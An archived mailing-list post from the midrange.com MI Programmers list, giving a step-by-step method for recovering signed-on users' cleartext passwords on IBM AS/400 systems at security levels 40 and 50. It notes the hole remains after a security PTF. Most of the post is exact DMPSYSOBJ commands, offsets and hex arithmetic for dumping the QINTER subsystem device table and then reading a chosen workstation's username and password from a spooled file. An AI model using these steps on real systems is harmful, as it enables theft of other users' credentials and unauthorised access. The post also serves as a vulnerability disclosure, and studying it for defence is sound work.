|
midrange.com
DMPSYSOBJ still displays cleartext passwords after last month's security
PTF is applied, and still works on level 40 and 50. Two steps are needed.
First dump the subsystem device table. For example the following will dump
the device table in subsystem QINTER in library QSYS:
DMPSYSOBJ OBJ(QINTER) +
CONTEXT(QSYS) +
OBJTYPE(*SBSD) +
OFFSET(190)
This will generate a spooled file of device names. Scan the spooled file
for the 10-character device name you want to sniff (e.g. DSP96). When you
find it, look to the left for the 'Offset in Space' number, and add X'80'.
For example if the device name appears in dump line X'F9E0', then:
X'F9E0'
+ X'0080'
---------
X'FA60'
Use this result as the second OFFSET number in another DMPSYSOBJ, for
example:
DMPSYSOBJ OBJ(QINTER) +
CONTEXT(QSYS) +
OBJTYPE(*SBSD) +
OFFSET(190 FA60 60 40) +
SPACE(6 1A)
If the target workstation is signed on, this generates a spooled file
showing the username and cleartext password.
+---
| This is the MI Programmers Mailing List!
| To submit a new message, send your mail to MI400@midrange.com.
| To subscribe to this list send email to MI400-SUB@midrange.com.
| To unsubscribe from this list send email to MI400-UNSUB@midrange.com.
| Questions should be directed to the list owner/operator: dr2@cssas400.com
+---
As an Amazon Associate we earn from qualifying purchases.
This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].
Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.
